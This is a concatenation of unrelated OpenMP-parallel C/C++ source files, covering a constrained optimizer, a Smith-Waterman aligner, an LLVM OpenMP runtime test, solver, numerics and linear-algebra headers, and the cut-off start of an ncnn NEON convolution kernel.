if (maxiter == INT_MAX && maxnfeval == INT_MAX) {printf("[Warning: no limit on iterations and function evaluations passed]");}
printf("Initial function value: %10.4f\n\n", curr_fun_val);
}
for (*niter = 0; *niter < maxiter; (*niter)++)
{
/* get gradient */
grad_fun(x, n, grad_curr, data);
/* determine search direction - this requires 3 passess over 'x' */
/* first pass: get a capped gradient */
#pragma omp parallel for schedule(static) firstprivate(x, direction_curr, grad_curr) num_threads(nthreads)
for (size_t_for i = 0; i < n_szt; i++)
{
direction_curr[i] = (x[i] <= 0 && grad_curr[i] >= 0)? 0 : -grad_curr[i];
}
/* at first iteration, stop with that */
if (*niter > 0)
{
/* second pass: calculate beta and theta constants */
theta = 0;
beta = 0;
#if !defined(_WIN32) && !defined(_WIN64)
#pragma omp parallel for schedule(static) firstprivate(x, direction_prev, grad_curr, grad_prev, n_szt) reduction(+:theta, beta) num_threads(nthreads)
#endif
for (size_t_for i = 0; i < n_szt; i++)
{
theta += ( x[i] <= 0 )? 0 : grad_curr[i] * direction_prev[i];
beta += ( x[i] <= 0 )? 0 : grad_curr[i] * (grad_curr[i] - grad_prev[i]);
}
theta /= grad_prev_norm_sq;
beta /= grad_prev_norm_sq;
/* third pass: add to direction info on previous direction and gradient differences */
#pragma omp parallel for schedule(static) firstprivate(x, direction_curr, direction_prev, grad_curr, grad_prev, n_szt, theta, beta) num_threads(nthreads)
for (size_t_for i = 0; i < n_szt; i++)
{
direction_curr[i] += ( x[i] <= 0 )? 0 : beta * direction_prev[i] - theta * (grad_curr[i] - grad_prev[i]);
}
}
/* check if stop criterion is satisfied */
prod_grad_dir = cblas_ddot(n, grad_curr, 1, direction_curr, 1);
if ( fabs(prod_grad_dir) <= tol )
{
return_value = tol_achieved;
goto terminate_procedure;
}
/* determine maximum step size */
max_step = 1.0;
#if defined(_OPENMP)
#if !defined(_WIN32) && !defined(_WIN64)
#pragma omp parallel for schedule(static) firstprivate(x, direction_curr, n_szt) reduction(min: max_step) num_threads(nthreads)
#endif
for (size_t_for i = 0; i < n_szt; i++)
{
max_step = (direction_curr[i] < 0)? -x[i] / direction_curr[i] : 1.0;
}
max_step = fmin(max_step, 1.0);
#else
for (size_t i = 0; i < n_szt; i++)
{
if (direction_curr[i] < 0) { max_step = fmin(max_step, -x[i] / direction_curr[i]); }
}
#endif
/* perform line search */
cblas_daxpy(n, max_step, direction_curr, 1, x, 1);
direction_norm_sq = cblas_ddot(n, direction_curr, 1, direction_curr, 1);
for (ls = 0; ls < max_ls; ls++)
{
if (extra_nonneg_tol)
{
#pragma omp parallel for schedule(static) firstprivate(x, n_szt) num_threads(nthreads)
for (size_t_for i = 0; i < n_szt; i++){x[i] = nonneg(x[i]);}
}
obj_fun(x, n, &new_fun_val, data);
if ( !isinf(new_fun_val) && !isnan(new_fun_val) )
{
if (new_fun_val <= curr_fun_val - lnsrch_const * square(max_step * pow(decr_lnsrch, ls)) * direction_norm_sq)
{ break; }
}
(*nfeval)++; if (*nfeval >= maxnfeval) { revert_x = 1; return_value = stop_maxnfeval; goto terminate_procedure; }
/* go to new step size by modifying x in-place */
cblas_daxpy(n, max_step * ( pow(decr_lnsrch, ls + 1) - pow(decr_lnsrch, ls) ), direction_curr, 1, x, 1);
}
curr_fun_val = new_fun_val;
if ( cb != NULL) { cb(x, n, curr_fun_val, *niter, data); }
/* update norm of gradient */
grad_prev_norm_sq = cblas_ddot(n, grad_curr, 1, grad_curr, 1);
/* next time, write to the other side of grad and dir arrays */
direction_prev = direction_curr;
grad_prev = grad_curr;
ix_rotation = incr_ix_rotation(ix_rotation);
direction_curr = direction_curr_n_prev + get_curr_ix_rotation(ix_rotation, n);
grad_curr = grad_curr_n_prev + get_curr_ix_rotation(ix_rotation, n);
if (verbose)
{
printf("Iteration %3d : f(x) = %10.4f, |<g(x), d(x)>| = %12.4f, nfev = %3d, ls = %2d\n",
(int) *niter + 1, curr_fun_val, fabs(prod_grad_dir), (int) *nfeval, (int) ls +1 );
}
}
terminate_procedure:
if (dealloc_buffer) { free(buffer_arr); }
if (revert_x)
{
cblas_daxpy(n, -max_step * pow(decr_lnsrch, ls), direction_curr, 1, x, 1);
if (extra_nonneg_tol)
{
#pragma omp parallel for schedule(static) firstprivate(x, n_szt) num_threads(nthreads)
for (size_t_for i = 0; i < n_szt; i++){x[i] = nonneg(x[i]);}
}
}
if (verbose)
{
if (return_value == tol_achieved) { printf("\nTerminated: |<g(x), d(x)>| driven below tol.\n"); }
if (return_value == stop_maxnfeval) { printf("\nTerminated: reached maximum number of function evaluations\n"); }
if (return_value == stop_maxiter) { printf("\nTerminated: reached maximum number of iterations\n"); }
printf("Last f(x) = %10.4f\n\n", curr_fun_val);
}
*fun_val = curr_fun_val;
return (int) return_value;
}
|
code.c | #include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <omp.h>
#define RESET "\033[0m"
#define BOLDRED "\033[1m\033[31m" /* Bold Red */
#define PATH -1
#define NONE 0
#define UP 1
#define LEFT 2
#define DIAGONAL 3
void similarityScore(long long int i, long long int j, int* H, int* P, long long int* maxPos);
int matchMissmatchScore(long long int i, long long int j);
void backtrack(int* P, long long int maxPos);
void printMatrix(int* matrix);
void printPredecessorMatrix(int* matrix);
void generate(void);
long long int m = 11; //Columns - Size of string a
long long int n = 7; //Lines - Size of string b
int matchScore = 5;
int missmatchScore = -3;
int gapScore = -4;
char *a, *b;
int main(int argc, char* argv[]) {
int thread_count = strtoll(argv[1], NULL, 10);
m = strtoll(argv[2], NULL, 10);
n = strtoll(argv[3], NULL, 10);
#ifdef DEBUG
printf("\nMatrix[%lld][%lld]\n", n, m);
#endif
a = malloc(m * sizeof(char));
b = malloc(n * sizeof(char));
m++;
n++;
int *H;
H = calloc(m * n, sizeof(int));
int *P;
P = calloc(m * n, sizeof(int));
generate();
long long int maxPos = 0;
long long int i, j;
double Time=0.0;
double initialTime = omp_get_wtime();
//serial implementation
#pragma omp parallel for shared(H, P, maxPos) private(i,j) collapse(2)
for (i = 1; i < n; i++) //Lines
for (j = 1; j < m; j++) //
similarityScore(i, j, H, P, &maxPos);
backtrack(P, maxPos);
double finalTime = omp_get_wtime();
Time+=(double)(finalTime - initialTime);
#ifdef DEBUG
printf("\nSimilarity Matrix:\n");
printMatrix(H);
printf("\nPredecessor Matrix:\n");
printPredecessorMatrix(P);
printf("\nElapsed time: %f\n\n", Time);
#endif
free(H);
free(P);
free(a);
free(b);
return 0;
}
void similarityScore(long long int i, long long int j, int* H, int* P, long long int* maxPos) {
int up, left, diag;
long long int index = m * i + j;
up = H[index - m] + gapScore;
left = H[index - 1] + gapScore;
diag = H[index - m - 1] + matchMissmatchScore(i, j);
int max = NONE;
int pred = NONE;
if (diag > max) { //same letter ↖
max = diag;
pred = DIAGONAL;
}
if (up > max) { //remove letter ↑
max = up;
pred = UP;
}
if (left > max) { //insert letter ←
max = left;
pred = LEFT;
}
H[index] = max;
P[index] = pred;
if (max > H[*maxPos]) {
*maxPos = index;
}
}
int matchMissmatchScore(long long int i, long long int j) {
if (a[j-1] == b[i-1])
return matchScore;
else
return missmatchScore;
}
void backtrack(int* P, long long int maxPos) {
long long int predPos;
do {
if(P[maxPos] == DIAGONAL)
predPos = maxPos - m - 1;
else if(P[maxPos] == UP)
predPos = maxPos - m;
else if(P[maxPos] == LEFT)
predPos = maxPos - 1;
P[maxPos]*=PATH;
maxPos = predPos;
} while(P[maxPos] != NONE);
}
void printMatrix(int* matrix) {
long long int i, j;
for (i = 0; i < n; i++) { //Lines
for (j = 0; j < m; j++) {
printf("%d\t", matrix[m * i + j]);
}
printf("\n");
}
}
void printPredecessorMatrix(int* matrix) {
long long int i, j, index;
for (i = 0; i < n; i++) { //Lines
for (j = 0; j < m; j++) {
index = m * i + j;
if(matrix[index] < 0) {
printf(BOLDRED);
if (matrix[index] == -UP)
printf("↑ ");
else if (matrix[index] == -LEFT)
printf("← ");
else if (matrix[index] == -DIAGONAL)
printf("↖ ");
else
printf("- ");
printf(RESET);
} else {
if (matrix[index] == UP)
printf("↑ ");
else if (matrix[index] == LEFT)
printf("← ");
else if (matrix[index] == DIAGONAL)
printf("↖ ");
else
printf("- ");
}
}
printf("\n");
}
}
void generate(){
long long int i;
for(i=0;i<m;i++){
int aux=rand()%4;
if(aux==0)
a[i]='A';
else if(aux==2)
a[i]='C';
else if(aux==3)
a[i]='G';
else
a[i]='T';
}
for(i=0;i<n;i++){
int aux=rand()%4;
if(aux==0)
b[i]='A';
else if(aux==2)
b[i]='C';
else if(aux==3)
b[i]='G';
else
b[i]='T';
}
}
|
kmp_detach_tasks_t1.c | // RUN: %libomp-compile && env OMP_NUM_THREADS='3' %libomp-run
// RUN: %libomp-compile && env OMP_NUM_THREADS='1' %libomp-run
// REQUIRES: !abt
#include <stdio.h>
#include <omp.h>
#include "omp_my_sleep.h"
// detached untied
#define PTASK_FLAG_DETACHABLE 0x40
// OpenMP RTL interfaces
typedef unsigned long long kmp_uint64;
typedef long long kmp_int64;
typedef struct ID {
int reserved_1;
int flags;
int reserved_2;
int reserved_3;
char *psource;
} id;
// Compiler-generated code (emulation)
typedef struct ident {
void* dummy; // not used in the library
} ident_t;
typedef enum kmp_event_type_t {
KMP_EVENT_UNINITIALIZED = 0,
KMP_EVENT_ALLOW_COMPLETION = 1
} kmp_event_type_t;
typedef struct {
kmp_event_type_t type;
union {
void *task;
} ed;
} kmp_event_t;
typedef struct shar { // shareds used in the task
} *pshareds;
typedef struct task {
pshareds shareds;
int(*routine)(int,struct task*);
int part_id;
// void *destructor_thunk; // optional, needs flag setting if provided
// int priority; // optional, needs flag setting if provided
// ------------------------------
// privates used in the task:
omp_event_handle_t evt;
} *ptask, kmp_task_t;
typedef int(*task_entry_t)(int, ptask);
#ifdef __cplusplus
extern "C" {
#endif
extern int __kmpc_global_thread_num(void *id_ref);
extern ptask __kmpc_omp_task_alloc(id *loc, int gtid, int flags,
size_t sz, size_t shar, task_entry_t rtn);
extern int __kmpc_omp_task(id *loc, int gtid, ptask task);
extern omp_event_handle_t __kmpc_task_allow_completion_event(
ident_t *loc_ref, int gtid, ptask task);
#if __cplusplus
}
#endif
int volatile checker;
// User's code, outlined into task entry
int task_entry(int gtid, ptask task) {
checker = 1;
return 0;
}
int main() {
int i, j, gtid = __kmpc_global_thread_num(NULL);
int nt = omp_get_max_threads();
ptask task;
pshareds psh;
checker = 0;
omp_set_dynamic(0);
#pragma omp parallel //num_threads(N)
{
#pragma omp master
{
int gtid = __kmpc_global_thread_num(NULL);
omp_event_handle_t evt;
/*
#pragma omp task detach(evt)
{}
*/
task = (ptask)__kmpc_omp_task_alloc(NULL,gtid,PTASK_FLAG_DETACHABLE,sizeof(struct task),sizeof(struct shar),&task_entry);
psh = task->shareds;
evt = (omp_event_handle_t)__kmpc_task_allow_completion_event(NULL,gtid,task);
task->evt = evt;
__kmpc_omp_task(NULL, gtid, task);
my_sleep(2.0);
omp_fulfill_event(evt);
} // end master
} // end parallel
// check results
if (checker == 1) {
printf("passed\n");
return 0;
} else {
printf("failed\n");
return 1;
}
}
|
variable_bound_move_generator.h | /*****************************************************************************/
// Copyright (c) 2020-2021 Yuji KOGUMA
// Released under the MIT license
// https://opensource.org/licenses/mit-license.php
/*****************************************************************************/
#ifndef PRINTEMPS_NEIGHBORHOOD_VARIABLE_BOUND_MOVE_MOVE_GENERATOR_H__
#define PRINTEMPS_NEIGHBORHOOD_VARIABLE_BOUND_MOVE_MOVE_GENERATOR_H__
#include "abstract_move_generator.h"
namespace printemps {
namespace neighborhood {
/*****************************************************************************/
template <class T_Variable, class T_Expression>
class VariableBoundMoveGenerator
: public AbstractMoveGenerator<T_Variable, T_Expression> {
private:
public:
/*************************************************************************/
VariableBoundMoveGenerator(void) {
/// nothing to do
}
/*************************************************************************/
virtual ~VariableBoundMoveGenerator(void) {
/// nothing to do
}
/*************************************************************************/
void setup(const std::vector<model_component::Constraint<
T_Variable, T_Expression> *> &a_RAW_CONSTRAINT_PTRS) {
/**
* Exclude constraints which contain fixed variables or selection
* variables.
*/
auto constraint_ptrs =
extract_effective_constraint_ptrs(a_RAW_CONSTRAINT_PTRS);
/**
* Convert constraint objects to BinomialConstraint objects.
*/
auto binomials = convert_to_binomial_constraints(constraint_ptrs);
/**
* Setup move objects.
*/
const int BINOMIALS_SIZE = binomials.size();
this->m_moves.resize(4 * BINOMIALS_SIZE);
this->m_flags.resize(4 * BINOMIALS_SIZE);
for (auto i = 0; i < BINOMIALS_SIZE; i++) {
auto &move = this->m_moves[4 * i];
move.sense = MoveSense::VariableBound;
move.alterations.emplace_back(binomials[i].variable_ptr_first, 0);
move.alterations.emplace_back(binomials[i].variable_ptr_second, 0);
move.is_univariable_move = false;
move.is_selection_move = false;
utility::update_union_set(
&(move.related_constraint_ptrs),
binomials[i].variable_ptr_first->related_constraint_ptrs());
utility::update_union_set(
&(move.related_constraint_ptrs),
binomials[i].variable_ptr_second->related_constraint_ptrs());
move.is_special_neighborhood_move = true;
move.is_available = true;
move.overlap_rate = 0.0;
this->m_moves[4 * i + 1] = move;
this->m_moves[4 * i + 2] = move;
this->m_moves[4 * i + 3] = move;
}
/**
* Setup move updater.
*/
auto move_updater = //
[this, binomials, BINOMIALS_SIZE](
auto * a_moves_ptr, //
auto * a_flags, //
const bool a_ACCEPT_ALL, //
const bool a_ACCEPT_OBJECTIVE_IMPROVABLE, //
const bool a_ACCEPT_FEASIBILITY_IMPROVABLE, //
[[maybe_unused]] const bool a_IS_ENABLED_PARALLEL) {
#ifdef _OPENMP
#pragma omp parallel for if (a_IS_ENABLED_PARALLEL) schedule(static)
#endif
for (auto i = 0; i < BINOMIALS_SIZE; i++) {
{
auto index = 4 * i;
auto &alterations = (*a_moves_ptr)[index].alterations;
T_Variable target = 0;
double target_temp =
(-binomials[i].constant_value -
binomials[i].sensitivity_first *
(binomials[i].variable_ptr_first->value() +
1)) /
binomials[i].sensitivity_second;
if ((binomials[i].sensitivity_second > 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Less) ||
(binomials[i].sensitivity_second < 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Greater)) {
target = static_cast<T_Variable>(
std::floor(target_temp));
} else {
target =
static_cast<T_Variable>(std::ceil(target_temp));
}
alterations[0].second =
binomials[i].variable_ptr_first->value() + 1;
alterations[1].second = target;
}
{
auto index = 4 * i + 1;
auto &alterations = (*a_moves_ptr)[index].alterations;
T_Variable target = 0;
double target_temp =
(-binomials[i].constant_value -
binomials[i].sensitivity_first *
(binomials[i].variable_ptr_first->value() -
1)) /
binomials[i].sensitivity_second;
if ((binomials[i].sensitivity_second > 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Less) ||
(binomials[i].sensitivity_second < 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Greater)) {
target = static_cast<T_Variable>(
std::floor(target_temp));
} else {
target =
static_cast<T_Variable>(std::ceil(target_temp));
}
alterations[0].second =
binomials[i].variable_ptr_first->value() - 1;
alterations[1].second = target;
}
{
auto index = 4 * i + 2;
auto &alterations = (*a_moves_ptr)[index].alterations;
T_Variable target = 0;
double target_temp =
(-binomials[i].constant_value -
binomials[i].sensitivity_second *
(binomials[i].variable_ptr_second->value() +
1)) /
binomials[i].sensitivity_first;
if ((binomials[i].sensitivity_first > 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Less) ||
(binomials[i].sensitivity_first < 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Greater)) {
target = static_cast<T_Variable>(
std::floor(target_temp));
} else {
target =
static_cast<T_Variable>(std::ceil(target_temp));
}
alterations[0].second = target;
alterations[1].second =
binomials[i].variable_ptr_second->value() + 1;
}
{
auto index = 4 * i + 3;
auto &alterations = (*a_moves_ptr)[index].alterations;
T_Variable target = 0;
double target_temp =
(-binomials[i].constant_value -
binomials[i].sensitivity_second *
(binomials[i].variable_ptr_second->value() -
1)) /
binomials[i].sensitivity_first;
if ((binomials[i].sensitivity_first > 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Less) ||
(binomials[i].sensitivity_first < 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Greater)) {
target = static_cast<T_Variable>(
std::floor(target_temp));
} else {
target =
static_cast<T_Variable>(std::ceil(target_temp));
}
alterations[0].second = target;
alterations[1].second =
binomials[i].variable_ptr_second->value() - 1;
}
}
const int MOVES_SIZE = a_moves_ptr->size();
#ifdef _OPENMP
#pragma omp parallel for if (a_IS_ENABLED_PARALLEL) schedule(static)
#endif
for (auto i = 0; i < MOVES_SIZE; i++) {
(*a_flags)[i] = 1;
if (!(*a_moves_ptr)[i].is_available) {
(*a_flags)[i] = 0;
continue;
}
if (neighborhood::has_fixed_variable((*a_moves_ptr)[i])) {
(*a_flags)[i] = 0;
continue;
}
if (neighborhood::has_bound_violation((*a_moves_ptr)[i])) {
(*a_flags)[i] = 0;
continue;
}
if (a_ACCEPT_ALL) {
/** nothing to do */
} else {
if (a_ACCEPT_OBJECTIVE_IMPROVABLE &&
neighborhood::has_objective_improvable_variable(
(*a_moves_ptr)[i])) {
continue;
}
if (a_ACCEPT_FEASIBILITY_IMPROVABLE &&
neighborhood::has_feasibility_improvable_variable(
(*a_moves_ptr)[i])) {
continue;
}
(*a_flags)[i] = 0;
}
}
};
this->m_move_updater = move_updater;
}
};
} // namespace neighborhood
} // namespace printemps
#endif
/*****************************************************************************/
// END
/*****************************************************************************/ |
omp_loop_static.h | // -*- C++ -*-
// Copyright (C) 2007, 2008, 2009, 2010 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the terms
// of the GNU General Public License as published by the Free Software
// Foundation; either version 3, or (at your option) any later
// version.
// This library is distributed in the hope that it will be useful, but
// WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// General Public License for more details.
// Under Section 7 of GPL version 3, you are granted additional
// permissions described in the GCC Runtime Library Exception, version
// 3.1, as published by the Free Software Foundation.
// You should have received a copy of the GNU General Public License and
// a copy of the GCC Runtime Library Exception along with this program;
// see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
// <http://www.gnu.org/licenses/>.
/** @file parallel/omp_loop_static.h
* @brief Parallelization of embarrassingly parallel execution by
* means of an OpenMP for loop with static scheduling.
* This file is a GNU parallel extension to the Standard C++ Library.
*/
// Written by Felix Putze.
#ifndef _GLIBCXX_PARALLEL_OMP_LOOP_STATIC_H
#define _GLIBCXX_PARALLEL_OMP_LOOP_STATIC_H 1
#include <omp.h>
#include <parallel/settings.h>
#include <parallel/basic_iterator.h>
namespace __gnu_parallel
{
/** @brief Embarrassingly parallel algorithm for random access
* iterators, using an OpenMP for loop with static scheduling.
*
* @param __begin Begin iterator of element sequence.
* @param __end End iterator of element sequence.
* @param __o User-supplied functor (comparator, predicate, adding
* functor, ...).
* @param __f Functor to @a process an element with __op (depends on
* desired functionality, e. g. for std::for_each(), ...).
* @param __r Functor to @a add a single __result to the already processed
* __elements (depends on functionality).
* @param __base Base value for reduction.
* @param __output Pointer to position where final result is written to
* @param __bound Maximum number of elements processed (e. g. for
* std::count_n()).
* @return User-supplied functor (that may contain a part of the result).
*/
template<typename _RAIter,
typename _Op,
typename _Fu,
typename _Red,
typename _Result>
_Op
__for_each_template_random_access_omp_loop_static(_RAIter __begin,
_RAIter __end, _Op __o,
_Fu& __f, _Red __r,
_Result __base,
_Result& __output,
typename std::iterator_traits<_RAIter>::difference_type __bound)
{
typedef typename std::iterator_traits<_RAIter>::difference_type
_DifferenceType;
_DifferenceType __length = __end - __begin;
_ThreadIndex __num_threads = std::min<_DifferenceType>
(__get_max_threads(), __length);
_Result *__thread_results;
# pragma omp parallel num_threads(__num_threads)
{
# pragma omp single
{
__num_threads = omp_get_num_threads();
__thread_results = new _Result[__num_threads];
for (_ThreadIndex __i = 0; __i < __num_threads; ++__i)
__thread_results[__i] = _Result();
}
_ThreadIndex __iam = omp_get_thread_num();
#pragma omp for schedule(static, _Settings::get().workstealing_chunk_size)
for (_DifferenceType __pos = 0; __pos < __length; ++__pos)
__thread_results[__iam] = __r(__thread_results[__iam],
__f(__o, __begin+__pos));
} //parallel
for (_ThreadIndex __i = 0; __i < __num_threads; ++__i)
__output = __r(__output, __thread_results[__i]);
delete [] __thread_results;
// Points to last element processed (needed as return value for
// some algorithms like transform).
__f.finish_iterator = __begin + __length;
return __o;
}
} // end namespace
#endif /* _GLIBCXX_PARALLEL_OMP_LOOP_STATIC_H */
|
temporal_method_utilities.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Suneth Warnakulasuriya (https://github.com/sunethwarna)
//
#if !defined(KRATOS_TEMPORAL_METHOD_UTILITIES_H_INCLUDED)
#define KRATOS_TEMPORAL_METHOD_UTILITIES_H_INCLUDED
// System includes
// External includes
// Project includes
// Application includes
#include "custom_utilities/method_utilities.h"
namespace Kratos
{
///@addtogroup RANSApplication
///@{
///@name Kratos Globals
///@{
namespace TemporalMethodUtilities
{
template <class TContainerType, class TContainerItemType, template <class T> class TDataRetrievalFunctor, template <class T> class TDataStorageFunctor, class TDataType>
void InitializeVariables(
TContainerType& rContainer,
const Variable<TDataType>& rOutputVariable,
const Variable<TDataType>& rReferenceVariable)
{
if (rContainer.size() > 0)
{
const int number_of_items = rContainer.size();
#pragma omp parallel for
for (int i = 0; i < number_of_items; ++i)
{
TContainerItemType& r_item = *(rContainer.begin() + i);
const TDataType& r_reference_value =
TDataRetrievalFunctor<TContainerItemType>()(r_item, rReferenceVariable);
TDataType output_value = rOutputVariable.Zero();
MethodUtilities::DataTypeSizeInitializer<TDataType>(output_value, r_reference_value);
TDataStorageFunctor<TContainerItemType>()(r_item, rOutputVariable, output_value);
}
}
}
template <class TContainerType, class TContainerItemType, template <class T> class TDataStorageFunctor>
void InitializeVariables(TContainerType& rContainer, const Variable<double>& rOutputVariable, const double InitializerValue)
{
if (rContainer.size() > 0)
{
const int number_of_items = rContainer.size();
#pragma omp parallel for
for (int i = 0; i < number_of_items; ++i)
{
TContainerItemType& r_item = *(rContainer.begin() + i);
TDataStorageFunctor<TContainerItemType>()(r_item, rOutputVariable, InitializerValue);
}
}
}
} // namespace TemporalMethodUtilities
} // namespace Kratos
#endif // KRATOS_TEMPORAL_METHOD_UTILITIES_H_INCLUDED |
dgetri.c | /**
*
* @file
*
* PLASMA is a software package provided by:
* University of Tennessee, US,
* University of Manchester, UK.
*
* @generated from /home/luszczek/workspace/plasma/bitbucket/plasma/compute/zgetri.c, normal z -> d, Fri Sep 28 17:38:06 2018
*
**/
#include "plasma.h"
#include "plasma_async.h"
#include "plasma_context.h"
#include "plasma_descriptor.h"
#include "plasma_internal.h"
#include "plasma_tuning.h"
#include "plasma_types.h"
#include "plasma_workspace.h"
/***************************************************************************//**
*
* @ingroup plasma_getri
*
* Computes the inverse of a matrix A using the LU factorization computed
* by plasma_dgetrf.
*
*******************************************************************************
*
* @param[in] n
* The order of the matrix A. n >= 0.
*
* @param[in,out] pA
* On entry, the LU factors computed by plasma_dgetrf.
* On exit, the inverse of A, overwriting the factors.
*
* @param[in] lda
* The leading dimension of the array A. lda >= max(1,n).
*
* @param[in] ipiv
* The pivot indices computed by plasma_dgetrf.
*
*******************************************************************************
*
* @retval PLASMA_SUCCESS successful exit
* @retval < 0 if -i, the i-th argument had an illegal value
* @retval > 0 if i, the (i,i) element of the factor U or L is
* zero, and the inverse could not be computed.
*
*******************************************************************************
*
* @sa plasma_cgetri
* @sa plasma_dgetri
* @sa plasma_sgetri
*
******************************************************************************/
int plasma_dgetri(int n, double *pA, int lda, int *ipiv)
{
// Get PLASMA context.
plasma_context_t *plasma = plasma_context_self();
if (plasma == NULL) {
plasma_fatal_error("PLASMA not initialized");
return PlasmaErrorNotInitialized;
}
// Check input arguments.
if (n < 0) {
plasma_error("illegal value of n");
return -1;
}
if (lda < imax(1, n)) {
plasma_error("illegal value of lda");
return -3;
}
// quick return
if (imax(n, 0) == 0)
return PlasmaSuccess;
// Tune parameters.
if (plasma->tuning)
plasma_tune_getrf(plasma, PlasmaRealDouble, n, n);
// Set tiling parameters.
int nb = plasma->nb;
// Create tile matrix.
plasma_desc_t A;
plasma_desc_t W;
int retval;
retval = plasma_desc_general_create(PlasmaRealDouble, nb, nb,
n, n, 0, 0, n, n, &A);
if (retval != PlasmaSuccess) {
plasma_error("plasma_desc_general_create() failed");
return retval;
}
retval = plasma_desc_general_create(PlasmaRealDouble, nb, nb,
n, nb, 0, 0, n, nb, &W);
if (retval != PlasmaSuccess) {
plasma_error("plasma_desc_general_create() failed");
plasma_desc_destroy(&A);
return retval;
}
// Initialize sequence.
plasma_sequence_t sequence;
retval = plasma_sequence_init(&sequence);
// Initialize request.
plasma_request_t request;
retval = plasma_request_init(&request);
// asynchronous block
#pragma omp parallel
#pragma omp master
{
// Translate to tile layout.
plasma_omp_dge2desc(pA, lda, A, &sequence, &request);
// Perform computation.
plasma_omp_dgetri(A, ipiv, W, &sequence, &request);
// Translate back to LAPACK layout.
plasma_omp_ddesc2ge(A, pA, lda, &sequence, &request);
}
// implicit synchronization
// Free matrices in tile layout.
plasma_desc_destroy(&W);
plasma_desc_destroy(&A);
// Return status.
int status = sequence.status;
return status;
}
/***************************************************************************//**
*
* Computes the inverse of a matrix A using the LU factorization.
* Non-blocking tile version of plasma_dgbsv().
* Operates on matrices stored by tiles.
* All matrices are passed through descriptors.
* All dimensions are taken from the descriptors.
* Allows for pipelining of operations at runtime.
*
*******************************************************************************
*
* @param[in] A
* On entry, the LU factors computed by plasma_dgetrf.
* On exit, the inverse of A, overwriting the factors.
*
* @param[in] ipiv
* The pivot indices computed by plasma_dgetrf.
*
* @param[out] W
* Workspace of dimension (n, nb)
*
* @param[in] sequence
* Identifies the sequence of function calls that this call belongs to
* (for completion checks and exception handling purposes). Check
* the sequence->status for errors.
*
* @param[out] request
* Identifies this function call (for exception handling purposes).
*
* @retval void
* Errors are returned by setting sequence->status and
* request->status to error values. The sequence->status and
* request->status should never be set to PlasmaSuccess (the
* initial values) since another async call may be setting a
* failure value at the same time.
*
*******************************************************************************
*
* @sa plasma_dgetri
* @sa plasma_omp_dgetri
* @sa plasma_omp_cgetri
* @sa plasma_omp_dgetri
* @sa plasma_omp_sgetri
*
******************************************************************************/
void plasma_omp_dgetri(plasma_desc_t A, int *ipiv, plasma_desc_t W,
plasma_sequence_t *sequence, plasma_request_t *request)
{
// Get PLASMA context.
plasma_context_t *plasma = plasma_context_self();
if (plasma == NULL) {
plasma_error("PLASMA not initialized");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
// Check input arguments.
if (plasma_desc_check(A) != PlasmaSuccess) {
plasma_error("invalid A");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
if (plasma_desc_check(W) != PlasmaSuccess) {
plasma_error("invalid W");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
if (sequence == NULL) {
plasma_error("NULL sequence");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
if (request == NULL) {
plasma_error("NULL request");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
// quick return
if (A.n == 0)
return;
// Invert triangular part.
plasma_pdtrtri(PlasmaUpper, PlasmaNonUnit, A, sequence, request);
// Compute product of inverse of the upper and lower triangles.
plasma_pdgetri_aux(A, W, sequence, request);
// Apply pivot.
plasma_pdgeswp(PlasmaColumnwise, A, ipiv, -1, sequence, request);
}
|
convolutiondepthwise_5x5_pack4.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void convdw5x5s1_pack4_neon(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Mat& _bias, const Option& opt)
{
int w = bottom_blob.w;
int outw = top_blob.w;
int outh = top_blob.h;
const int group = bottom_blob.c;
const float* bias = _bias;
#pragma omp parallel for num_threads(opt.num_threads)
for (int g=0; g<group; g++)
{
Mat out = top_blob.channel(g);
float32x4_t _bias0 = bias ? vld1q_f32((const float*)bias + g * 4) : vdupq_n_f32(0.f);
const float* k0 = kernel.row(g);
float* outptr0 = out.row(0);
float* outptr1 = out.row(1);
const Mat img0 = bottom_blob.channel(g);
const float* r0 = img0.row(0);
const float* r1 = img0.row(1);
const float* r2 = img0.row(2);
const float* r3 = img0.row(3);
const float* r4 = img0.row(4);
const float* r5 = img0.row(5);
int i = 0;
#if __aarch64__
for (; i+1 < outh; i+=2)
{
int j = 0;
for (; j+3 < outw; j+=4)
{
float32x4_t _sum00 = _bias0;
float32x4_t _sum01 = _bias0;
float32x4_t _sum02 = _bias0;
float32x4_t _sum03 = _bias0;
float32x4_t _sum10 = _bias0;
float32x4_t _sum11 = _bias0;
float32x4_t _sum12 = _bias0;
float32x4_t _sum13 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _r06 = vld1q_f32(r0+24);
